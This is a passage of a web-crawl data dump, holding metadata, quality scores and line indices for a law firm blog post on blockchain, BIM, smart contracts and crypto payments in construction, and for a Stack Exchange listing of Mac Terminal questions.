4407,
4421,
4436,
4451,
4456,
4523,
4531,
4540,
4551,
4562,
4590,
4615,
4640,
4693,
4722,
4747,
4798,
4809,
4839,
4840,
4917,
4918,
4931,
4932,
5035,
5036,
5049,
5050,
5205,
5206
],
"line_end_idx": [
34,
35,
49,
50,
337,
338,
865,
866,
877,
878,
899,
900,
1200,
1201,
1566,
1567,
1816,
1817,
1866,
1867,
2279,
2280,
2544,
2545,
2571,
2572,
2585,
2586,
2594,
2595,
2603,
2604,
2617,
2618,
2637,
2638,
2652,
2653,
2684,
2685,
2702,
2703,
2731,
2732,
2744,
2745,
2786,
2787,
2810,
2811,
2853,
2854,
2922,
2923,
2937,
2945,
2957,
2965,
2975,
2985,
2986,
3022,
3023,
3098,
3099,
3129,
3130,
3153,
3168,
3183,
3202,
3209,
3218,
3228,
3229,
3311,
3312,
3335,
3336,
3365,
3400,
3407,
3450,
3452,
3453,
3550,
3551,
3587,
3588,
3826,
3827,
3853,
3854,
3908,
3909,
3921,
3922,
4026,
4027,
4046,
4065,
4077,
4093,
4125,
4160,
4245,
4272,
4288,
4297,
4306,
4325,
4339,
4359,
4373,
4387,
4407,
4421,
4436,
4451,
4456,
4523,
4531,
4540,
4551,
4562,
4590,
4615,
4640,
4693,
4722,
4747,
4798,
4809,
4839,
4840,
4917,
4918,
4931,
4932,
5035,
5036,
5049,
5050,
5205,
5206,
5290
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5290,
"ccnet_original_nlines": 145,
"rps_doc_curly_bracket": 0.0003780699917115271,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.31423288583755493,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.017560070380568504,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.21072089672088623,
"rps_doc_frac_unique_words": 0.4207161068916321,
"rps_doc_mean_word_length": 5.355498790740967,
"rps_doc_num_sentences": 66,
"rps_doc_symbol_to_word_ratio": 0.015711650252342224,
"rps_doc_unigram_entropy": 5.166318416595459,
"rps_doc_word_count": 782,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.006208209786564112,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.004775550216436386,
"rps_doc_frac_chars_top_3gram": 0.010744989849627018,
"rps_doc_frac_chars_top_4gram": 0.013849089853465557,
"rps_doc_books_importance": -346.2550048828125,
"rps_doc_books_importance_length_correction": -346.2550048828125,
"rps_doc_openwebtext_importance": -226.6712188720703,
"rps_doc_openwebtext_importance_length_correction": -226.6712188720703,
"rps_doc_wikipedia_importance": -144.6099853515625,
"rps_doc_wikipedia_importance_length_correction": -144.6099853515625
},
"fasttext": {
"dclm": 0.9524978399276733,
"english": 0.8267173767089844,
"fineweb_edu_approx": 3.0784764289855957,
"eai_general_math": 0.9702416062355042,
"eai_open_web_math": 0.1884555220603943,
"eai_web_code": 0.9768232107162476
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1332",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.133",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-253,421,106,932,316,300
|
The Implementation and Expansion of Blockchain Technology in the Construction Industry Thumbnail
The Implementation and Expansion of Blockchain Technology in the Construction Industry
One technological advancement that could potentially alter the entire project delivery method is the continued development of blockchain technology. Undoubtedly, you have heard the term “blockchain technology” - associated with crypto currencies such as Bitcoin. At its core, blockchain technology is simply a platform that permits the upload, transfer and sharing of encrypted information within a secure “decentralized” database.
How does Blockchain work?
Blockchain, as the name suggests, is a database that is comprised of information “blocks” that are “chained” together with each other and subject to constant verification and authentication by independent users that utilize the database. Database users securely upload the encrypted information into time-stamped blocks. Those blocks are then subsequently linked together to form the “blockchain.” This blockchain database is decentralized, meaning that the information is not actually stored in a central location, such as a server. Instead, the information is spread across a network of users within the database. The internal authentication allows for the database to self-function without a third-party authenticator, such as a bank or government. Once a block of information is chained, it cannot be altered or unchained without the database user’s knowledge.
What effect does Blockchain have on the Construction Industry?
Blockchain technology, due to its decentralized nature, is most ripe for use and will have its greatest impact on IPD, and specifically, BIM modeling software.
IPD & BIM Modeling
Arguably one the biggest technological advancements currently transpiring within the construction industry is the development and implementation of full-scale Building Information Modeling (“BIM”) software in conjunction with the Integrated Project Delivery (“IPD”). IPD emphasizes and creates a collaborative environment with the free flow of information among all the project participants in the early stages of design and construction. One critical component of IPD is BIM software.
BIM software produces a three-dimensional, real-time, dynamic building model, which encompasses building geometry, spatial relationships, geographic information, and quantities and properties of building components. Further, the model generated is a parametric, digital design, which means that when one aspect of the design is altered, the other aspects of the design impacted by that change adjust automatically. Due to these capabilities, BIM software is an invaluable asset to the IPD method, as it provides a platform for collaboration of the parties and integration of their respective expertise and experience.
One obstacle that BIM software continues to face is the tracking of information and any changes made by project users accessing the construction model. Construction contracts, change orders, and design modifications have to be manually implemented into the model and distributed to the project parties. In its current state, BIM software lacks the ability to track and verify the information and modifications to the model itself. Enter blockchain.
By implementing blockchain technology, all users with access to the BIM project model can actively monitor and authenticate any changes or modifications to the project. Users will be notified in real time of any changes or uploads, who made the changes, and what the actual changes were without any further discussion. Simply put, implementing blockchain technology within the BIM/ IPD framework would streamline the collaboration efforts of all parties by gathering, maintaining, updating, and archiving all of the project information/ designs within a secure, reliable, transparent, and decentralized database.
Smart Contracts
A smart contract is the digital equivalent of today’s paper contract, in which the terms and conditions are actually source codes. When functioning correctly and/or fully implemented, the provisions within the smart contract become partially or fully automated (based on the code) without the need for any human action or direction. The implementation of smart contract automation also is reliant on blockchain technology. For example, in the context of payment provisions and procedures, smart contracts utilizing blockchain technology may eventually prevent the often exhausting and time-consuming payment delays that so frequently occur on a project. Once a subcontractor or trade completes a task, the completion is logged into the BIM software, and the funds are subsequently and instantaneously released to the contractor from the owner’s connected account. Any necessary documentation, such as lien waivers, could also be sent back to the owner based on the terms of the contract. By implementing and combining BIM software and smart contracts, the parties could avoid unnecessary delays and forego the submissions of paper pay apps and/or invoices all together.
Crypto Payments
Several major US retailers, including but not limited to Microsoft, Overstock, Home Depot, Starbucks and Tesla, currently accept limited forms of crypto currencies as payment for their respective products. Based on the sheer sizes and market shares of these aforementioned companies, it’s very likely that this is just the beginning.
The use of Crypto payments, especially in the construction industry, presents several benefits. For one, there are fewer fees and taxes incurred per transaction. Unlike traditional payments, crypto payments are not subject to bank transfer fees or credit card processing fees. Transactions typically cost less than one cent per transaction. In addition, the funds received in a crypto exchange are almost instantly available and do not require a lag period to confirm receipt.
Significant concerns and hurdles remain that need to be addressed before the use of crypto currencies can be fully integrated into the economy, including:
• Once the crypto currency is sent, the sender has no means to get the money back.
• Vendors that receive crypto payments may be subject to capital gains taxes if the value of the crypto received increases before they withdraw it from their account.
• Parties exchanging crypto will need to track and keep accurate records of the values of the currency they receive on each transaction to ensure compliance with applicable tax laws.
• Depending on the nature and size of the project, these additional tracking requirements could place a heavy strain on a company’s accounting department.
The continued development and expansion of technology within the construction industry over the course of the next decade will continue to alter the project delivery landscape.
Related professionals
Related practices
|
{
"url": "https://www.frantzward.com/news-blog/june-2021/the-implementation-and-expansion-of-blockchain-tec",
"source_domain": "www.frantzward.com",
"snapshot_id": "crawl=CC-MAIN-2022-40",
"warc_metadata": {
"Content-Length": "43678",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:CBS24RCSL7AXCRE6RVGQCFOFJJWBQM2F",
"WARC-Concurrent-To": "<urn:uuid:4eb57c2f-d24a-458d-9492-e57030fbd77a>",
"WARC-Date": "2022-09-27T14:29:50Z",
"WARC-IP-Address": "34.237.221.144",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:BVA4D63O7I3JQTJPASGFSW2MDBYASJGQ",
"WARC-Record-ID": "<urn:uuid:341db8e3-ae4c-4b9b-82cf-62b1f1007913>",
"WARC-Target-URI": "https://www.frantzward.com/news-blog/june-2021/the-implementation-and-expansion-of-blockchain-tec",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:45df07ae-da37-49ac-b90c-696e078b2638>"
},
"warc_info": "isPartOf: CC-MAIN-2022-40\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September/October 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-88\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
97,
98,
185,
186,
620,
621,
647,
1514,
1515,
1578,
1739,
1740,
1759,
2246,
2247,
2866,
2867,
3317,
3318,
3932,
3933,
3950,
5121,
5122,
5138,
5473,
5950,
5951,
6106,
6191,
6360,
6545,
6704,
6881,
6882,
6904,
6905
],
"line_end_idx": [
97,
98,
185,
186,
620,
621,
647,
1514,
1515,
1578,
1739,
1740,
1759,
2246,
2247,
2866,
2867,
3317,
3318,
3932,
3933,
3950,
5121,
5122,
5138,
5473,
5950,
5951,
6106,
6191,
6360,
6545,
6704,
6881,
6882,
6904,
6905,
6922
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 6922,
"ccnet_original_nlines": 37,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.39230769872665405,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.01794872060418129,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1230769231915474,
"rps_doc_frac_unique_words": 0.42322835326194763,
"rps_doc_mean_word_length": 5.652559280395508,
"rps_doc_num_sentences": 46,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.325304985046387,
"rps_doc_word_count": 1016,
"rps_doc_frac_chars_dupe_10grams": 0.02646699920296669,
"rps_doc_frac_chars_dupe_5grams": 0.02646699920296669,
"rps_doc_frac_chars_dupe_6grams": 0.02646699920296669,
"rps_doc_frac_chars_dupe_7grams": 0.02646699920296669,
"rps_doc_frac_chars_dupe_8grams": 0.02646699920296669,
"rps_doc_frac_chars_dupe_9grams": 0.02646699920296669,
"rps_doc_frac_chars_top_2gram": 0.008706250227987766,
"rps_doc_frac_chars_top_3gram": 0.02402924932539463,
"rps_doc_frac_chars_top_4gram": 0.01305938046425581,
"rps_doc_books_importance": -435.5277404785156,
"rps_doc_books_importance_length_correction": -435.5277404785156,
"rps_doc_openwebtext_importance": -270.5118103027344,
"rps_doc_openwebtext_importance_length_correction": -270.5118103027344,
"rps_doc_wikipedia_importance": -202.45310974121094,
"rps_doc_wikipedia_importance_length_correction": -202.45310974121094
},
"fasttext": {
"dclm": 0.20459246635437012,
"english": 0.927571177482605,
"fineweb_edu_approx": 2.289187431335449,
"eai_general_math": 0.21953648328781128,
"eai_open_web_math": 0.19523078203201294,
"eai_web_code": 0.16522222757339478
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "624.0285",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Bridges, Roofs, and Civil engineering"
}
},
"secondary": {
"code": "004.678",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
7,064,753,332,912,458,000
|
questions narrowly about terminal.app alone should use this tag. Please consider using **command-line** for any question not specifically about the native terminal app
learn more… | top users | synonyms
5
votes
1answer
1k views
How to have terminal close tab when shell exits?
I just recently upgraded from 10.6 to 10.8. On 10.6 I could set the terminal to close the tab/window when the shell exits. Mountain Lion's terminal just says the process is completed and the tab/...
38
votes
5answers
8k views
Is there a way to access a Mac's geolocation from terminal?
Some GUI apps use OS X location services, but I want to retrieve a Mac's physical location from the command line. This could be useful for running scripts, switching settings etc. The mechanism should ...
2
votes
1answer
9k views
For a startup volume encrypted with Core Storage, System Preferences show that FileVault is disabled
My iMac has a SSD and a HDD. The OS is installed on the SSD. I performed a clean installation of Mountain Lion to the SSD, and cloned my SSD using a backup from my Time Capsule in OS X Recovery. ...
0
votes
3answers
564 views
Producing/archiving an overview of a directory structure
I try to find a way to make an archive of my ~/ directory so that I can go back in case I've lost something. I've found several recommendations for this. The first being OS X Hints saying a simple ls -...
0
votes
2answers
932 views
How can I connect Linux server with Applescript using iTerm or Terminal?
I want to connect and run bash script on Linux server automatically by using Applescript and iTerm or Terminal on OS X. How can I connect Linux server with Applescript use iTerm or Terminal?
4
votes
4answers
11k views
Get disk temperature in terminal
Is there a command I can use just to get the hard disk temperature in the terminal? Is this possible without a third party app?
2
votes
1answer
678 views
Set terminal window title in a script
I would like to change the entire title of the terminal window for a particular bash script. I googled out but I couldn't find much more than this suggestion: printf "\e]0;My Custom Title\a" After ...
0
votes
2answers
730 views
How to change the color and format of the static host/path/user string in the Terminal or iTerm?
Example: cookie:~ j$ date Sun Aug 5 02:14:29 CEST 2012 cookie:~ j$ Just as it's pasted here, all three lines are of the same color. I would like to have "cookie:~ j$" or at least part of the ...
0
votes
0answers
2k views
Installation of Wine via MacPorts not working with 10.8 and XCode 4.4
I had installed wine on my computer with then 10.7.4. It worked perfectly. Then I updated to 10.8 and wine did not work, so I uninstalled wine and macports. It gave me an error that winetricks (I ...
1
vote
2answers
567 views
What is the format I should write the command to SSH into Linux VPS?
I am trying to use SSH and log in from the terminal into a Linux VPS. I have tried a few variations around the following: ssh [user]@[hostname].[my.ip.address.xx]:22 and keep getting: ssh: Could ...
11
votes
5answers
13k views
Open an app in fullscreen via Terminal
I wonder if it's possible to open a program in Lion fullscreen mode via the Terminal. I want to write a short script which starts a bunch of programs in fullscreen mode, so that I only have to click ...
0
votes
0answers
534 views
How can I play a sound from the command line running as sudo?
While typing afplay danger.mp3 in the Terminal will play the .mp3, doing sudo afplay danger.mp3 or sudo su and then afplay danger.mp3 does not. Any idea why is this? How can I use the afplay command ...
3
votes
3answers
6k views
PHP 5.4 Installation on Mountain Lion
I just installed Mountain Lion, and of course I've had to set up Xcode Command Line Tools, reinstall Git, and do other things to get up and running again for programming. Naturally, PHP was pushed ...
9
votes
3answers
13k views
How to fix Terminal error DYLD_ environment variables being ignored because main executable (/usr/bin/login) is setuid or setgid?
Any time I open a new terminal window (independent of terminal app), the console stderr displays dyld: DYLD_ environment variables being ignored because main executable (/usr/bin/login) is setuid or ...
1
vote
1answer
1k views
Is it possible to first enter a command and then choose “run in Terminal” in Quicksilver?
Is it possible to first enter a command and then choose "run in Terminal" in Quicksilver? Is there another way of doing it other than Quicksilver (though I would prefer Quicksilver)?
9
votes
2answers
2k views
What has changed in Terminal.app in OS X 10.8?
Just upgraded OS X to Mountain Lion and noticed that Terminal.app version has changed from 2.2.3 to 2.3. Unfortunately, can`t find any information about what has changed. Do you know if there is any ...
0
votes
1answer
2k views
$PATH error on a terminal
Before you raise your pitchforks, this is NOT another "How do I change my $PATH variable value?" question. I had installed Oh my zsh on my machine(Macbook Pro), and didn't like it. So I uninstalled it....
9
votes
3answers
5k views
error: There was a problem with the editor 'vi' when using it with git
I have this strange problem with using vi as the editor for git commit -a. Normal flow is: I type git commit -a, vi appears, I enter my commit message, and then :wq to save & exit from vi. This ...
2
votes
2answers
35k views
How can I re-run the initial Setup Assistant on Mountain Lion?
As described in my write-up on custom keyboard layouts, in some situations it can be useful to re-run the Setup Assistant (the app that you get when you start a new Mac for the first time, or do a ...
10
votes
1answer
2k views
How to share history between terminal tabs?
I generally find myself using two or three tabs in my Terminal on OS X. A minor inconvenience is often that the tabs don't share a command history. So things like history | grep thingIamlooking for ...
0
votes
1answer
1k views
How can I access a remote machine via SSH from behind a proxy?
I’m trying to connect to a Linux machine via SSH. The problem is that my Mac is in a different network, behind a proxy that routes HTTP and HTTPS through port 80. How can I access the Linux machine ...
172
votes
8answers
90k views
How can I trigger a Notification Center notification from an AppleScript or shell script?
I'd love to be able to take advantage of 10.8's Notification Center features in AppleScripts and shell scripts I write. Is there a built-in command or a third-party library I can use from either an ...
0
votes
0answers
1k views
ifconfig - get IPs of connected USB devices
In Ubuntu, ifconfig lists all the USB devices with the header "usb0, usb1, ..etc" I need to know the IP addresses of all the connected USB devices. It would be really helpful if on Mac it displayed ...
9
votes
3answers
16k views
How do I check the download progress of Mountain Lion through the terminal?
I am downloading Mountain Lion, I know I can monitor download progress through the Mac App Store purchases screen but I want to know if I can monitor progress through Terminal.app using a shell ...
1
vote
1answer
145 views
difference between disk size in console vs disk utility
Console results df -h disk utility results What explains the large difference here in capacity as well as used memory? And which is more reliable.
0
votes
1answer
481 views
Can't create alias for 'nano ~/.bash_profile'
I tried to make an alias to edit my bash profile, but when I save and relaunch a new window, I get the following: Last login: Sun Jul 22 12:00:25 on ttys001 -bash: alias: nano ~/.bash_profile: not ...
2
votes
2answers
2k views
Mac: how to securely delete an SD card?
Nothing I have tried gives me read/WRITE access to my SD card from my Canon camera. How can I secure-delete before selling the card on eBay? (the lock switch is on: unlocked - tried the other position ...
0
votes
1answer
197 views
Applescript to monitor terminal changes
I want to be able to check if a word appears in a terminal window running a java application and then display a notification. Any ideas?
2
votes
2answers
218 views
How to get + metacharacter for sed in Terminal?
It looks like sed that comes with Mac OS 1.7.4 is the original one, without the + metacharacter. Can I get the + metacharacter functionality?
4
votes
2answers
2k views
How to get a “modern” emacs that runs in a terminal on os x lion?
I just installed Prompt on my iPad so I could possiby do some real work on my iMac via ssh. so far Mutt and Vim and emacs seemto work responsively enough for me. I've made a few tries at emacs ...
5
votes
4answers
1k views
pbpaste, pbcopy using wrong pasteboard?
I'm converting a shell script which xclip and similar tools on Linux, to use pbpaste and pbcopy on Mac. The problem is the default pasteboard ('general' according to the man-page) for these tools is ...
3
votes
2answers
2k views
Unable to save hosts file after adding websites to block.
I'm unable to save hosts file after adding websites to block,as well as unable to flush cache. I am not a techie, just researching on the web, and trying to follow directions for terminal and Text ...
3
votes
3answers
520 views
Any way to force command line terminal to control a Mac?
I'm experimenting a little with Automator at the moment and often get stuck with some pre-recorded automation running very slowly while the whole Mac (an 2010 iMac in my case) doesn't respond to any ...
17
votes
3answers
5k views
How do I find the windowid to pass to screencapture -l?
The command line utility screencapture claims to be able to capture a single window without requiring interaction, but I can't figure out what to pass it. -l<windowid> capture this windowsid ...
3
votes
4answers
7k views
How to list all files in directory excluding any that start with a dot?
I'm currently using the command find /Volumes/DriveName > driveName.txt to create a file listing of all files that are on the drive. How could I modify my command (or what would be a better ...
2
votes
3answers
8k views
Change label on USB drive in OSX Terminal
I am trying to write a program in Python that will rename a USB drive (from the standard "USB DISK" to my custom "MYDISK"). However, I can't find any way to do this neither in Python nor in OSX ...
4
votes
1answer
7k views
How can I move Dashboard widgets to the desktop in Lion?
In the OS X Terminal, there is a command that allows me to drag Dashboard widgets onto my desktop. In OS X Lion, the Dashboard became a Space. I am no longer able to use this command. What is a ...
2
votes
1answer
232 views
Why does my terminal show a string like this?
When I open my terminal it shows this: wpa-2-602:~ david$ I just curious what the wpa-2-602 means? "david" is my user name, and sometimes it was something else. What makes it change?
10
votes
4answers
3k views
iTunes track notifications for Mountain Lion
In OS X Lion there was the preference (via a Terminal command) to enable iTunes track notifications that were displayed as a popup in the dock. So far it seems as though Mountain Lion does not allow ...
6
votes
2answers
2k views
Change my shell to a different bash version at /usr/local/bin/bash?
How can I set my /usr/local/bin/bash (which is the 4.2 version that allows auto-completion of 'cd to directory with directory name') to be my default bash for a new window instead of my regular (v3.2....
1
vote
3answers
3k views
Change owner for all files owned by x
I copyied files from my MacBook, mainly files from /usr. The one and only user on my computer is called 'Julian' (like on my MacBook). A lot of the copied files are now owned by '501' (id of "Julian" ...
1
vote
1answer
482 views
Search all hidden .htaccess files inside a folder and run a terminal command?
Searching for the issue, I found this Q&A: How can I show only an .htaccess file in the Finder? [...] you could create a symlink to the file in its directory, omitting the dot in the name: ...
138
votes
6answers
69k views
git auto-complete for *branches* at the command line?
On my linux machine I have autocomplete for branches with git. [Note we are talking about git branch completion, not bash completion (e.g. commands, files, etc). Thus NOT lane's answer at all] For ...
1
vote
2answers
734 views
How do I disable DVD player auto start when a DVD is inserted by using Terminal
If anyone can help me with this it would be the best! I have just installed 150 Mac minis in a hotel and I'm using remote desktop management to control them. Now I need to disable DVD player auto ...
0
votes
2answers
2k views
Executing program through Terminal
I have Sage (math program) and I want to execute it through terminal. I know I can go to the directory and execute it with - open Sage.app But would I really want to do is simply type sage in ...
2
votes
1answer
887 views
Why doesn't the screen command source my .profile?
When I start a new screen, the aliases that I have set in my ~/.profile do not seem to be sourced. Does anyone know where I can change this or which file is actually read when starting a new screen?
3
votes
1answer
3k views
Is there a way to get gnome-terminal on Lion?
Is there a port of gnome-terminal, or a way to compile it, or some other program that is typographically comparable, under Lion? There is a typographic difference, and I can't duplicate it in ...
6
votes
1answer
393 views
Is it possible that some hacker is logged in to my computer?
When I type w at the terminal I see myself logged in two times. What are console and s000? Is it possible that one of these neos is actually somebody else?
14
votes
2answers
3k views
cd to a directory by typing its name?
For example if a directory 'blob' exists and I just type 'blob[return]' then the system cds into the blob directory for me. In Linux (Ubuntu) I can add shopt -s autocd to my .bashrc file, but on OS X ...
1
vote
3answers
9k views
Where can I find gcc in Xcode 3.2.6?
I have a Mac with OS X 10.6.8 Snow Leopard. I'm trying very hard to learn the basics of programming in C, but I can't get my first simple program to run. I read online to go to Xcode Preferences -> ...
|
{
"url": "http://apple.stackexchange.com/questions/tagged/terminal?page=48&sort=newest&pagesize=15",
"source_domain": "apple.stackexchange.com",
"snapshot_id": "crawl=CC-MAIN-2016-26",
"warc_metadata": {
"Content-Length": "181938",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:KOXYKV5TJ6JQOGWC4GQ76HLNU663J55U",
"WARC-Concurrent-To": "<urn:uuid:1065cea5-b600-4425-9e3d-aa11c56df657>",
"WARC-Date": "2016-06-28T20:57:54Z",
"WARC-IP-Address": "151.101.65.69",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:QEWJHHTRWPZ7FWN4U2N4UHZFT6TM6JEW",
"WARC-Record-ID": "<urn:uuid:4dfddd4d-46d1-4754-ae27-a61197f0422c>",
"WARC-Target-URI": "http://apple.stackexchange.com/questions/tagged/terminal?page=48&sort=newest&pagesize=15",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:401a3c5f-1d85-4f00-80f6-6f4be17e04ec>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-164-35-72.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2016-26\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for June 2016\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
168,
169,
204,
205,
207,
213,
221,
230,
231,
280,
281,
480,
483,
489,
498,
507,
508,
568,
569,
774,
776,
782,
790,
799,
800,
901,
902,
1101,
1103,
1109,
1118,
1128,
1129,
1186,
1187,
1392,
1394,
1400,
1409,
1419,
1420,
1493,
1494,
1685,
1687,
1693,
1702,
1712,
1713,
1746,
1747,
1875,
1877,
1883,
1891,
1901,
1902,
1940,
1941,
2142,
2144,
2150,
2159,
2169,
2170,
2267,
2268,
2463,
2465,
2471,
2480,
2489,
2490,
2560,
2561,
2761,
2763,
2768,
2777,
2787,
2788,
2857,
2858,
3057,
3060,
3066,
3075,
3085,
3086,
3125,
3126,
3329,
3331,
3337,
3346,
3356,
3357,
3419,
3420,
3623,
3625,
3631,
3640,
3649,
3650,
3688,
3689,
3890,
3892,
3898,
3907,
3917,
3918,
4048,
4049,
4252,
4254,
4259,
4267,
4276,
4277,
4367,
4368,
4551,
4553,
4559,
4568,
4577,
4578,
4625,
4626,
4829,
4831,
4837,
4845,
4854,
4855,
4881,
4882,
5087,
5089,
5095,
5104,
5113,
5114,
5185,
5186,
5384,
5386,
5392,
5401,
5411,
5412,
5475,
5476,
5677,
5680,
5686,
5694,
5703,
5704,
5748,
5749,
5951,
5953,
5959,
5967,
5976,
5977,
6040,
6041,
6243,
6247,
6253,
6262,
6272,
6273,
6363,
6364,
6566,
6568,
6574,
6583,
6592,
6593,
6637,
6638,
6840,
6842,
6848,
6857,
6867,
6868,
6944,
6945,
7143,
7145,
7150,
7158,
7168,
7169,
7225,
7226,
7373,
7375,
7381,
7389,
7399,
7400,
7446,
7447,
7648,
7650,
7656,
7665,
7674,
7675,
7715,
7716,
7921,
7923,
7929,
7937,
7947,
7948,
7988,
7989,
8126,
8128,
8134,
8143,
8153,
8154,
8202,
8203,
8345,
8347,
8353,
8362,
8371,
8372,
8438,
8439,
8636,
8638,
8644,
8653,
8662,
8663,
8703,
8704,
8907,
8909,
8915,
8924,
8933,
8934,
8992,
8993,
9194,
9196,
9202,
9211,
9221,
9222,
9279,
9280,
9483,
9486,
9492,
9501,
9510,
9511,
9567,
9568,
9763,
9765,
9771,
9780,
9789,
9790,
9862,
9863,
10057,
10059,
10065,
10074,
10083,
10084,
10126,
10127,
10325,
10327,
10333,
10341,
10350,
10351,
10408,
10409,
10607,
10609,
10615,
10623,
10633,
10634,
10680,
10681,
10864,
10867,
10873,
10882,
10891,
10892,
10937,
10938,
11141,
11143,
11149,
11158,
11167,
11168,
11236,
11237,
11441,
11443,
11448,
11457,
11466,
11467,
11505,
11506,
11710,
11712,
11717,
11725,
11735,
11736,
11814,
11815,
12008,
12012,
12018,
12027,
12037,
12038,
12092,
12093,
12294,
12296,
12301,
12310,
12320,
12321,
12401,
12402,
12602,
12604,
12610,
12619,
12628,
12629,
12664,
12665,
12861,
12863,
12869,
12877,
12887,
12888,
12939,
12940,
13139,
13141,
13147,
13155,
13164,
13165,
13211,
13212,
13408,
13410,
13416,
13424,
13434,
13435,
13496,
13497,
13653,
13656,
13662,
13671,
13680,
13681,
13719,
13720,
13924,
13926,
13931,
13940,
13949,
13950,
13987,
13988
],
"line_end_idx": [
168,
169,
204,
205,
207,
213,
221,
230,
231,
280,
281,
480,
483,
489,
498,
507,
508,
568,
569,
774,
776,
782,
790,
799,
800,
901,
902,
1101,
1103,
1109,
1118,
1128,
1129,
1186,
1187,
1392,
1394,
1400,
1409,
1419,
1420,
1493,
1494,
1685,
1687,
1693,
1702,
1712,
1713,
1746,
1747,
1875,
1877,
1883,
1891,
1901,
1902,
1940,
1941,
2142,
2144,
2150,
2159,
2169,
2170,
2267,
2268,
2463,
2465,
2471,
2480,
2489,
2490,
2560,
2561,
2761,
2763,
2768,
